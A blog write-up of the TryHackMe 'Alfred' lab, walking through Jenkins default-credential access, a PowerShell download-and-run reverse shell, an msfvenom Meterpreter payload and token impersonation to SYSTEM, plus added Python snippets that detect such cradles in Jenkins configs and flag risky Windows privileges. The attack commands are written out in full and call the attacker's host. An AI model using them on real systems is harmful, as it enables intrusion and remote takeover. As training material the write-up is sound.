TryHackMe: Alfred

‘Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.’

I AM THE NIGHT

Hey everyone, Jin here, long time no blog! I popped in to see if there was any activity while I was hard-focused on studying for the eJPT and I found this little buddy all alone in the drafts. I mentioned I'd be writing a blog talking about that over on Twitter, but for now let's get this one shaped up and out the door while we're here, yes?

Onwards, to TryHackMe's Alfred room~

Task 1 - Initial Access

Today's box focuses on a misconfiguration in Jenkins, a tool used to build continuous integration/continuous delivery (CI/CD) pipelines that let developers automatically build and deploy their code once they've made changes to it.

We'll start out with our usual nmap -A -p- 10.10.59.22 -vv to scan the machine while we read on. (While I was on LinkedIn, I was informed that this scan is really loud and could crash weaker networks. A better alternative would be to start with -sS on the standard ports and build from what we find there.)

This room wants us to use Nishang to gain initial access. This should be interesting, as I've never heard of or used Nishang before. But of course, that won't stop us from reaching our goal.

Question 1: How many ports are open? (TCP only)

It would seem that our usual scan is saying the host is down. But we know better. Let's add -Pn to our scan so nmap skips host discovery and doesn't check whether the host is up: nmap -A -p- -Pn 10.10.59.22 -vv

The scan isn't quite finished yet, but we're only looking for TCP so it seems we have our answer.

Question 2: What is the username and password for the log in panel (in the format username:password)?

On port 80 we have a simple memorial page.

But our scan showed us port 8080. Navigating there, we get a login page.

Interesting. In the spirit of Occam's Razor, let's try logging in with admin:admin.

You know... I would have expected better from the house of the Bat. But here we are.

Question 3: Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it: powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port. You first need to download the PowerShell script and make it available for the server to download. You can do this by creating an HTTP server with Python: python3 -m http.server

That's a big question. To answer it, let's click around. Let's start with that project; it seems interesting.

That takes us to this screen.

Okay. Let's head into the Workspace.

Here's what we get.

Doesn't seem like much is here. Ah, but that Configure looks tasty. If things can be edited and pushed live, maybe there's a way to execute code in the Configure area.

We've got a good bit of stuff here. But if we click ‘Build’:

It seems we've hit the jackpot.

Before we go any further, we need to do some setting up. First, download the script mentioned in the task description. We can do that with wget on the raw page: wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

Then we open up a Python HTTP server in that same directory with the same command from the question: python3 -m http.server

Now that that's set up, we copy the command from the question and enter it in the command box in Jenkins. Don't forget to change the IP and port~

But wait! Before you click ‘Apply’, make sure to set up your netcat session with nc -lvnp 4444.

... it didn't work. Let's try to figure out why. When we clicked ‘Apply’, we got Build #2 here.

Clicking Build #2, we come to this page.

If we click the Console Output tab, we get this.

Aha. We forgot to set our server info in the payload. Let's go do that.

Once we change that, it should work.

Make sure the top box is set to your server and the bottom box is set to your listener, then click ‘Save’ followed by ‘Build Now’ on the next screen.

As the build runs, we get our shell!
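Seen from the defender's side, the build step we just abused is persisted in the job's config.xml under $JENKINS_HOME/jobs/<job>/, so the same pattern can be audited there. The Python below is an added example, not part of the room or of Jenkins itself: the config.xml is a constructed sample (host and port made up), and the element names it inspects, hudson.tasks.BatchFile and hudson.tasks.Shell, are the ones Jenkins writes for its batch and shell build steps.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of a Jenkins freestyle job config.xml. The first build step
# is an "Execute Windows batch command" step carrying the download cradle from
# the walkthrough; the second is a normal shell step. Host and port are made up.
SAMPLE_CONFIG_XML = """<project>
  <description>Nightly build</description>
  <builders>
    <hudson.tasks.BatchFile>
      <command>powershell iex (New-Object Net.WebClient).DownloadString('http://10.0.0.5:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.5 -Port 4444</command>
    </hudson.tasks.BatchFile>
    <hudson.tasks.Shell>
      <command>mvn -B clean package</command>
    </hudson.tasks.Shell>
  </builders>
</project>
"""

# Build-step element names Jenkins uses for steps that run arbitrary commands
# on the controller or agent (batch on Windows, sh on Unix).
COMMAND_STEPS = ("hudson.tasks.BatchFile", "hudson.tasks.Shell")

# Indicators of in-memory script download/execution and reverse shells.
SUSPICIOUS_PATTERNS = {
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b", re.I),
    "invoke_expression": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "reverse_shell": re.compile(r"Invoke-PowerShellTcp|-Reverse\b|\bnc(\.exe)?\s.*\s-e\b", re.I),
    "encoded_command": re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I),
}


def audit_job_config(config_xml: str) -> list[dict]:
    """Return one finding per command-running build step: step type, command, matched indicators."""
    findings = []
    for step in ET.fromstring(config_xml).iter():
        if step.tag not in COMMAND_STEPS:
            continue
        cmd = (step.findtext("command") or "").strip()
        hits = sorted(name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(cmd))
        findings.append({"step": step.tag, "command": cmd, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in audit_job_config(SAMPLE_CONFIG_XML):
        verdict = "SUSPICIOUS" if f["indicators"] else "ok"
        print(f"[{verdict}] {f['step']}: {f['command'][:70]} {f['indicators']}")
```

Run it over every jobs/*/config.xml on a controller; any hit in a job that nobody recognises deserves the same look that Build #2's console output got above.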

Question 4: What is the user.txt flag?

In Windows, we can use dir to list the contents of a directory and chdir to change directories.

Get-Content lets us see the contents of a file. User flag get.

And that completes Task 1~

Task 2 - Switching Shells

This task walks us through switching to a Meterpreter shell. I won't get into all the details of the process because, well, someone's hard work and effort went into making this task, so I'll leave it to them. I will, however, document the process.

First, we need to use the provided msfvenom command to generate a payload. Don't forget to change the necessary bits again~ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe

Question 1: What is the final size of the exe payload that you generated?

That would be some number of bytes that msfvenom tells you when it's done.

Now that that's made, I hope you've still got that HTTP server running. Hop over to your other reverse shell and pull the payload we just made onto the target with the following command: powershell "(New-Object System.Net.WebClient).DownloadFile('http://<ip>:8000/shell-name.exe','shell-name.exe')"

We can dir just to make sure it downloaded, since there's no confirmation. Now, before we run it, we need to set up our Metasploit listener. Use msfconsole to get Metasploit started, then the provided commands to get the listener ready:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [your-ip]
set LPORT [listening-port]
run

Now that that's running, we can run the payload waiting on the target machine: Start-Process "shell-name.exe"

If all went well...

We'll have our shell.

And that completes Task 2~

Task 3 - Privilege Escalation

Now that we're in, we're going to use token impersonation to gain SYSTEM access. I'll be a little more verbose here, because in addition to being a write-up, these are my notes, and I'm not very familiar with this.

In short, Windows uses tokens to ensure accounts have the right privileges. They're usually assigned when users log in or are authenticated. This is usually done by LSASS.exe.

The access token consists of the user's SID (security identifier), group SIDs, privileges, and other things. More can be found at docs.microsoft.com/en-us/windows/win32/seca..

There are two types of access tokens: primary access tokens, which are associated with a user account and are generated on log on, and impersonation tokens, which allow a process or a thread in a process to gain access to resources using the token of another user or client process. Almost like SUID in Linux.

There! With that out of the way, let's get to work.

The first question wants us to view all the privileges using whoami /priv. (If it doesn't work from the Meterpreter shell, try it from the first shell.)

Just like the next question says, SeDebugPrivilege and SeImpersonatePrivilege are enabled. Now we need to load incognito into Meterpreter.
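As an added example (not from the room, Nishang or Metasploit), here is a small Python audit of whoami /priv output that flags the class of privileges the question points at, the ones a service account like Jenkins's should not hold. The sample output is constructed to mirror what the walkthrough sees, and the list of high-risk privileges is the standard set that lets a holder act as another account or bypass token checks.

```python
import re

# Constructed sample of `whoami /priv` output, in the format the walkthrough
# reads, for a service account like the one Jenkins runs under on the box.
SAMPLE_WHOAMI_PRIV = """PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeDebugPrivilege              Debug programs                            Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that let the holder act as another account or bypass the access
# checks tokens enforce; a build-server service account rarely needs any of them.
HIGH_RISK = {
    "SeImpersonatePrivilege": "can adopt another client's token (token impersonation)",
    "SeAssignPrimaryTokenPrivilege": "can assign a primary token to a new process",
    "SeDebugPrivilege": "can open any process, including LSASS",
    "SeTcbPrivilege": "acts as part of the operating system",
    "SeBackupPrivilege": "reads any file regardless of its ACL",
    "SeRestorePrivilege": "writes any file regardless of its ACL",
    "SeLoadDriverPrivilege": "loads kernel drivers",
    "SeTakeOwnershipPrivilege": "takes ownership of any securable object",
}


def parse_whoami_priv(output: str) -> dict[str, str]:
    """Map privilege name -> State column ('Enabled'/'Disabled') from whoami /priv text."""
    privs = {}
    for line in output.splitlines():
        parts = line.split()
        # Data rows start with an Se*Privilege name; the State column is the last word.
        if len(parts) >= 2 and re.fullmatch(r"Se\w+Privilege", parts[0]):
            privs[parts[0]] = parts[-1]
    return privs


def risky_privileges(privs: dict[str, str], enabled_only: bool = False) -> list[tuple[str, str, str]]:
    """Return (name, state, reason) for each high-risk privilege held. Disabled ones are
    included by default: the holder can enable them at will, so 'Disabled' is no mitigation."""
    return [(n, s, HIGH_RISK[n]) for n, s in privs.items()
            if n in HIGH_RISK and (s == "Enabled" or not enabled_only)]


if __name__ == "__main__":
    for name, state, reason in risky_privileges(parse_whoami_priv(SAMPLE_WHOAMI_PRIV)):
        print(f"{name:28} {state:9} {reason}")
```

The fix on the build server is to run the service under a virtual or managed service account without these rights, or to remove them through the local security policy's user-rights assignments.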

Question 3: To check which tokens are available, enter list_tokens -g. We can see that the BUILTIN\Administrators token is available. Use the impersonate_token "BUILTIN\Administrators" command to impersonate the Administrators token. What is the output when you run the getuid command?

Let's follow the question. First we list the tokens.

There's the admin token. Now let's impersonate it.

Lastly, the getuid command.

The next question explains that we may not actually have the permissions of a privileged user, because what we can and can't do is determined by the primary token, not the impersonation token. So we need to migrate to a process with the correct permissions. First we run ps to view all the processes.

Then we migrate to the PID of services.exe with migrate 668.

Question 5: read the root.txt file at C:\Windows\System32\config

Since we're in Meterpreter, we can use things like cd and cat.

There's our root flag, and that completes the Alfred room~

It's been a while, but this was another room in the Offensive path. Once I get this eJPT I'll be coming back hard for this path, but for now I'll just keep studying.

That's all for now, see you in the next bit~